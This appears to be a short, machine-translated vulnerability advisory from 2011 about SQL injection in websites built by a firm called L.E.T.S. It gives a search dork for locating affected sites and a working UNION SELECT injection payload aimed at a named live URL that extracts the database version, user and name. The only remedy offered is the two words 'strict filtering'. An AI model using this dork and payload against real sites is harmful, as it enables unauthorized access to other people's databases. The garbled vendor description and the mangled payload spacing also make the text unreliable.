Vulnerability Description: Leading Edge Technology Solutions (L. e. t. s) SQL injection vulnerability due to lax filtering; L. e. t. S is a time of inspiration for the development of Web Design in cutting-edge technology fields. Whether it's an innovator or entrepreneur in a small business, our task is to investigate and analyze the existing data produced by the market for specific products. Successful commercial entities evaluate competitors, target population data, and explore product information from the simplest and safest way to prove success.
Publisher/Date: RoAd_KiLlEr-2011-05-05
Keywords: intext: Website By L. E. T. S
Vulnerability Testing: basically, if the system is php? All pages with id = have the SQL injection vulnerability;
Poc: http://www.bkjia.com/testimonial.detail.view.php? ID = [SQL IN]
Demo: http://www.bkjia.com/testimonial.detail.view.php? ID = 17 + and + 1 = 0 + Union + select + 1, 2, @ version, user (), database (), 6, 7, 8, 9, 10, 11, 12, 13 --
Fixed: strict filtering.
By yesckblog